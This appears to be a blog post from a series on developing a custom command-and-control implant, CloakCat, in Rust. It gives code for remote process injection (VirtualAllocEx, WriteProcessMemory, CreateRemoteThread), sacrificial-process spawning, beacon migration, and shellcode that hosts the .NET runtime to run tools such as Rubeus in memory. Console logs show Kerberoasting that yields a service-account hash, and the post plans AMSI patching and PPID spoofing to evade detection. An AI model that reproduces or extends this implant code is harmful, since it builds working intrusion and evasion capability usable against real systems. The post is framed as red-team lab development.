Custom C2 Development #3 — Implementing Process Injection and execute-assembly in Rust

Author: CloakCat · 8 min read

The CloakCat vs Cobalt Strike analysis in the previous post surfaced two critical gaps: no process injection, and no execute-assembly. Without these, real red team workflows are fundamentally broken — every post-ex capability runs inside the agent process, and you can't execute .NET tooling in-memory. These were prerequisites before CloakCat could be used for lab work. Phase 10 and Phase 11 were implemented back-to-back.


Why These Two Were Urgent

The previous post's gap analysis made two things impossible to ignore: no process injection and no execute-assembly.

The operational impact is concrete. Without process injection, every post-ex capability runs inside the agent process — when the agent dies, everything dies with it. Without execute-assembly, there's no in-memory execution path for .NET tooling. Rubeus, Seatbelt, SharpHound — half the AD attack surface is inaccessible.

These were hard prerequisites for following any realistic lab scenario with CloakCat. Phase 10 (process injection) and Phase 11 (execute-assembly) were implemented consecutively.


Phase 10: Process Injection

Classic Injection — Still Relevant

The most fundamental injection primitive is the one everyone knows:

OpenProcess → VirtualAllocEx → WriteProcessMemory → VirtualProtectEx → CreateRemoteThread

This pattern is well-documented and EDR vendors have been building signatures against it for years. It persists because blocking this API call chain wholesale breaks legitimate software — debuggers, profilers, anti-cheat engines, and Windows system services all use these APIs. What EDRs can do is evaluate whether this combination is executing in a suspicious context. Making that judgment wrong is the operator's job.

The implementation detail that mattered here was W^X compliance. Rather than allocating with PAGE_EXECUTE_READWRITE in a single call, the implementation uses a two-phase approach: allocate with PAGE_READWRITE → copy shellcode → transition to PAGE_EXECUTE_READ via VirtualProtectEx. RWX memory is a standalone IOC — it flags immediately in most EDRs regardless of context.

// Allocate RW: writable, not executable
let mem = VirtualAllocEx(process, null(), sc_len,
    MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

// Copy shellcode
WriteProcessMemory(process, mem, sc_ptr, sc_len, &mut written);

// Transition RW → RX — executable now, no longer writable
VirtualProtectEx(process, mem, sc_len, PAGE_EXECUTE_READ, &mut old);

// Execute
CreateRemoteThread(process, null(), 0, mem, null(), 0, null_mut());
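
The W^X property described above can be checked on the protection constants alone, which is also roughly how a memory scanner reasons about a region. The following is a minimal sketch, not CloakCat code: the constants are the documented Win32 values from winnt.h, while the helper names `is_writable_and_executable` and `history_respects_wx` are hypothetical and introduced only for illustration.

```rust
// Documented Win32 memory-protection constants (winnt.h).
const PAGE_READWRITE: u32 = 0x04;
const PAGE_EXECUTE_READ: u32 = 0x20;
const PAGE_EXECUTE_READWRITE: u32 = 0x40;
const PAGE_EXECUTE_WRITECOPY: u32 = 0x80;

/// Hypothetical helper: true when a protection value makes a page
/// writable and executable at the same time, i.e. it breaks W^X.
fn is_writable_and_executable(protect: u32) -> bool {
    // Only the low byte carries the base protection; modifiers such as
    // PAGE_GUARD (0x100) live in the higher bits and are masked off.
    matches!(
        protect & 0xFF,
        PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
    )
}

/// Hypothetical helper: true when no state in a region's protection
/// history is writable and executable at once.
fn history_respects_wx(history: &[u32]) -> bool {
    history.iter().all(|&p| !is_writable_and_executable(p))
}
```

Under these assumptions, the two-phase sequence `[PAGE_READWRITE, PAGE_EXECUTE_READ]` passes the check, while a single `PAGE_EXECUTE_READWRITE` allocation fails it. The RW to RX transition is itself observable, so passing this check only removes the standalone RWX indicator.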

spawn+inject — The Sacrificial Process Pattern

Injecting into an existing process is functional, but the operationally cleaner pattern is spawning a sacrificial process. Create a suspended process via CreateProcessW, inject into it, then resume.

The advantage is straightforward. An implant inside an existing process shares that process's fate in both directions: if the host exits, the implant dies, and if the injected code faults, the host crashes. Inject into explorer.exe and hit a problem, and the desktop is gone. A sacrificial process limits the blast radius to itself. This is why the spawnto setting exists: it gives the operator control over which process gets spawned.

// Create process in suspended state
CreateProcessW(exe_path, null_mut(), null(), null(),
    0, CREATE_SUSPENDED, null(), null(), &si, &mut pi);

// Injection (standard chain above)
// ...

// Resume — execution begins
ResumeThread(pi.h_thread);

The default spawnto target is svchost.exe. There are dozens of svchost instances running on any Windows host — one more doesn't stand out. A careful analyst will flag the PPID anomaly (parent should be services.exe, not the agent process), but PPID Spoofing is Phase 14.
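
The PPID anomaly mentioned above is easy to express as a check over a process snapshot, which shows why it stands out to an analyst. This is a minimal sketch from the defender's point of view: the `ProcessRecord` type, the `suspicious_svchost` function, and the sample data (including the `agent.exe` name) are all hypothetical, and the only rule encoded is the one stated in the text, that svchost.exe should be parented by services.exe.

```rust
/// Hypothetical snapshot record; real data would come from a process
/// listing or EDR telemetry.
struct ProcessRecord {
    pid: u32,
    ppid: u32,
    name: &'static str,
}

/// Returns the PIDs of svchost.exe instances whose parent is not services.exe.
fn suspicious_svchost(procs: &[ProcessRecord]) -> Vec<u32> {
    procs
        .iter()
        .filter(|p| p.name.eq_ignore_ascii_case("svchost.exe"))
        .filter(|p| {
            // Look the parent up by PID. A parent that is missing from the
            // snapshot is treated as anomalous too.
            !procs
                .iter()
                .any(|q| q.pid == p.ppid && q.name.eq_ignore_ascii_case("services.exe"))
        })
        .map(|p| p.pid)
        .collect()
}

/// Made-up sample data for illustration only.
fn sample_snapshot() -> Vec<ProcessRecord> {
    vec![
        ProcessRecord { pid: 700, ppid: 600, name: "services.exe" },
        ProcessRecord { pid: 1200, ppid: 700, name: "svchost.exe" },
        ProcessRecord { pid: 3412, ppid: 5000, name: "agent.exe" },
        ProcessRecord { pid: 6712, ppid: 3412, name: "svchost.exe" },
    ]
}
```

With the sample snapshot, only PID 6712 is reported, because its parent is the agent rather than services.exe. A production check would also need to account for PID reuse and compare process creation times, which this sketch ignores.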

migrate — Relocating the Beacon

migrate moves the current beacon into a different process. Mechanically, it injects its own shellcode into a target PID and terminates the originating process.

The scenario is common. Initial access drops the agent into notepad.exe. User closes Notepad — beacon dies. Migrating into a long-running process like svchost.exe or RuntimeBroker.exe fixes the stability problem.


Phase 11: execute-assembly

Why This Matters

The majority of the red team tooling ecosystem is .NET. Rubeus (Kerberos attacks), Seatbelt (host enumeration), SharpHound (BloodHound data collection), Certify (ADCS abuse) — execute-assembly is what lets you run these tools without writing to disk.

execute-assembly Rubeus.exe kerberoast in Cobalt Strike is a single command. Implementing it from scratch requires hosting the CLR (Common Language Runtime) — bootstrapping the .NET runtime inside a process, loading assembly bytes from memory, locating the EntryPoint, and invoking it.

Inline Mode — Direct Execution in the Agent Process

The simplest implementation hosts the CLR inside the agent process itself.

CLRCreateInstance → ICLRMetaHost
    → GetRuntime("v4.0.30319") → ICLRRuntimeInfo
    → GetInterface(ICorRuntimeHost)
    → Start()
    → GetDefaultDomain() → AppDomain
    → Load_3(byte[] assembly) → Assembly
    → get_EntryPoint() → MethodInfo
    → Invoke_3(args)

In Rust, this entire chain is manual COM vtable calls. The windows-sys crate doesn't expose CLR interfaces, so IIDs and CLSIDs need to be defined manually, vtable offsets need to be computed from SDK documentation, and function signatures need to be cast as extern "system" fn(...) pointers.

The failure mode for inline mode is fatal — if the .NET tool throws an unhandled exception, the CLR terminates the process. Beacon and all capabilities go with it. Inline mode is available but gated behind an explicit --inline flag.

spawn+execute — The Operationally Sound Implementation

The approach that's actually usable is spawn+execute. Build on Phase 10's spawn+inject infrastructure: inject CLR-hosting shellcode into a sacrificial process, capture output via Named Pipe.

1. Create Named Pipe (parent holds read end)
2. Spawn sacrificial process (CREATE_SUSPENDED)
3. Inject CLR hosting shellcode + assembly data
4. CreateRemoteThread → child bootstraps CLR + executes assembly
5. Child redirects stdout/stderr to Named Pipe
6. Parent (beacon) reads output from pipe
7. Wait for child termination, clean up

Step 3 is where the complexity concentrates. The injected shellcode needs to be position-independent while simultaneously hosting the entire CLR. What that shellcode does:

Resolve CoInitializeEx from ole32.dll, SafeArray functions from oleaut32.dll, and CLRCreateInstance from mscoree.dll. Initialize COM, bootstrap the CLR, read assembly bytes from the injected data block, copy into a SafeArray, load via AppDomain.Load_3, locate the EntryPoint, and invoke it. Before execution, redirect stdout to the Named Pipe so output flows back to the parent.

Generating this entire sequence as x86_64 position-independent shellcode came out to over 1,200 lines. The approach is pushing machine code bytes into a Vec<u8> with emit helper functions — manageable with the right abstractions.

// COM vtable call helper
fn vtcall(code: &mut Vec<u8>, slot: u32) {
    code.extend(&[0x48, 0x8B, 0x01]);  // mov rax, [rcx]
    let off = (slot * 8) as i32;
    code.extend(&[0xFF, 0x90]);          // call [rax + offset]
    code.extend(&off.to_le_bytes());
}

// ICLRMetaHost::GetRuntime (vtable slot 3)
ld_rcx_rsp(code, 0x80);          // this = ICLRMetaHost*
lea_rdx_rbx(code, off.str_v4);   // "v4.0.30319"
lea_r8_rbx(code, off.iid_ri);    // IID_ICLRRuntimeInfo
lea_r9_rsp(code, 0x88);          // &out
vtcall(code, 3);

Invoke Retry on Signature Mismatch

Real .NET tools have varied Main signatures — Main(string[] args) and Main() (no parameters) both exist. If the first Invoke_3 fails on parameter mismatch, the implementation retries with empty parameters.
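
The retry logic is a plain fallback on one specific error. The sketch below models only that control flow and makes no CLR calls: `InvokeError`, `invoke_entry_point`, and `fake_parameterless_main` are hypothetical names, and the closure stands in for whatever wraps Invoke_3 in the real implementation.

```rust
/// Hypothetical error type standing in for the failure Invoke_3 reports.
#[derive(Debug, PartialEq)]
enum InvokeError {
    ParameterMismatch,
    Other(String),
}

/// Calls `invoke` with the argument array first. On a parameter mismatch it
/// retries once with no parameters; any other result is returned unchanged.
fn invoke_entry_point<F>(args: &[String], mut invoke: F) -> Result<(), InvokeError>
where
    F: FnMut(Option<&[String]>) -> Result<(), InvokeError>,
{
    match invoke(Some(args)) {
        Err(InvokeError::ParameterMismatch) => invoke(None),
        other => other,
    }
}

/// Stand-in for a parameterless Main(): rejects any argument array.
fn fake_parameterless_main(params: Option<&[String]>) -> Result<(), InvokeError> {
    match params {
        Some(_) => Err(InvokeError::ParameterMismatch),
        None => Ok(()),
    }
}
```

Restricting the retry to the mismatch case matters: retrying after any other failure would run the tool's entry point twice.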


The Reality of COM Interop in Rust

The biggest time sink across Phases 10 and 11 wasn't Windows API logic; it was COM interop in Rust. In C/C++, header files define COM interfaces and the compiler handles vtable dispatch automatically. In Rust with windows-sys, everything is manual.

IIDs are 16-byte arrays defined by hand. Vtable offsets are pulled from SDK documentation and hardcoded. Function signatures are manually cast to extern "system" fn(...) pointers. Getting ICorRuntimeHost::GetDefaultDomain's vtable slot wrong by one — slot 13 vs 14 — produces a process crash with no diagnostic output.
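
Two of those manual steps can be shown without touching any COM object: the byte layout of a hand-written IID and the slot-to-offset arithmetic. This is a minimal sketch under stated assumptions. The `Guid` struct mirrors the Win32 GUID field layout, `IID_IUNKNOWN` is the well-known IUnknown interface ID, `EXAMPLE_GUID` is an arbitrary value chosen to make byte order visible (not a real interface ID), and `vtable_offset_x64` is a hypothetical helper that assumes 8-byte pointers.

```rust
/// Same field layout as the Win32 GUID struct.
#[repr(C)]
#[derive(Clone, Copy, Debug, PartialEq)]
struct Guid {
    data1: u32,
    data2: u16,
    data3: u16,
    data4: [u8; 8],
}

impl Guid {
    /// Byte image as it sits in memory on a little-endian target: the first
    /// three fields are byte-swapped relative to the textual form, data4 is not.
    fn to_bytes(self) -> [u8; 16] {
        let mut out = [0u8; 16];
        out[0..4].copy_from_slice(&self.data1.to_le_bytes());
        out[4..6].copy_from_slice(&self.data2.to_le_bytes());
        out[6..8].copy_from_slice(&self.data3.to_le_bytes());
        out[8..16].copy_from_slice(&self.data4);
        out
    }
}

/// IID_IUnknown: {00000000-0000-0000-C000-000000000046}
const IID_IUNKNOWN: Guid = Guid {
    data1: 0,
    data2: 0,
    data3: 0,
    data4: [0xC0, 0, 0, 0, 0, 0, 0, 0x46],
};

/// Arbitrary illustrative value, NOT a real interface ID:
/// {00112233-4455-6677-8899-AABBCCDDEEFF}
const EXAMPLE_GUID: Guid = Guid {
    data1: 0x0011_2233,
    data2: 0x4455,
    data3: 0x6677,
    data4: [0x88, 0x99, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF],
};

/// Byte offset of a vtable slot, assuming a 64-bit target (8-byte pointers).
const fn vtable_offset_x64(slot: u32) -> u32 {
    slot * 8
}
```

Slots 13 and 14 map to offsets 0x68 and 0x70, so an off-by-one in the slot number lands on the neighbouring method with a different signature, which is consistent with the silent crash described above. The first three IUnknown methods (QueryInterface, AddRef, Release) always occupy slots 0 to 2, so an interface's own methods start at slot 3.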

The WMI COM vtable work in lateral.rs was directly applicable. The pattern is identical — more interfaces, plus SafeArray/BSTR/VARIANT type manipulation added on top. Without that prior work, Phase 11 implementation time would have been significantly longer.


Validation

Process Injection

cl0akcat > agents
[corp-dc] alive, PID 3412

cl0akcat > inject corp-dc 4568
cl0akcat > agents
[corp-dc] alive, PID 3412
[corp-dc-2] alive, PID 4568    ← new beacon

cl0akcat > spawn corp-dc
cl0akcat > agents
[corp-dc] alive, PID 3412
[corp-dc-3] alive, PID 7890    ← beacon injected into spawnto process

cl0akcat > migrate corp-dc 2048
cl0akcat > agents
[corp-dc] alive, PID 2048      ← PID updated

execute-assembly

cl0akcat > execute-assembly corp-dc ./Rubeus.exe kerberoast
cl0akcat > tail corp-dc
[*] Spawned 'svchost.exe' (PID 6712), assembly executed
[*] Action: Kerberoasting
[*] SPN: MSSQLSvc/sql01.corp.local:1433
[*] Hash: $krb5tgs$23$*svc_sql$corp.local$...

cl0akcat > execute-assembly corp-dc ./Seatbelt.exe -group=all
cl0akcat > tail corp-dc
[*] Spawned 'svchost.exe' (PID 8234), assembly executed
====== AMSIProviders ======
...
====== AntiVirus ======
  Engine: Windows Defender
  ProductEXE: windowsdefender://
...

Known Gaps

To be direct about what's still broken:

AMSI is not bypassed. The moment execute-assembly hosts the CLR, AMSI activates. Running Rubeus against a Defender-enabled target gets caught. Phase 14 will implement AmsiScanBuffer patching — until then, the workaround is either disabling Defender or running an AMSI-patching BOF first.

No Sleep Mask. Injected beacons have plaintext code in memory during sleep. EDR periodic memory scanning will catch this.

CreateRemoteThread is the noisiest injection primitive available. APC injection, thread hijacking, module stomping — none of these are implemented yet. The current technique is among the most well-signatured patterns in EDR detection logic.

PPID anomaly is unresolved. Sacrificial svchost.exe processes spawned by the agent have the agent as their parent. Legitimate svchost instances are parented by services.exe. This is Phase 14's PPID Spoofing work.


Summary

Phases 10 and 11 together added approximately 2,500 lines of code. More than half of that is the CLR-hosting shellcode generation for execute-assembly.

The operational impact of these two phases is significant. Before: shell commands and file operations. After: beacon injection into arbitrary processes, in-memory .NET execution, process migration — actual C2 operational workflow.

The technical foundation required to run real lab scenarios with CloakCat is now in place. The next post covers deploying CloakCat against an actual lab environment.


This is the third post in the CloakCat development series.

Previous: Custom C2 Development #2 — CloakCat vs Cobalt Strike: A Feature Parity Analysis
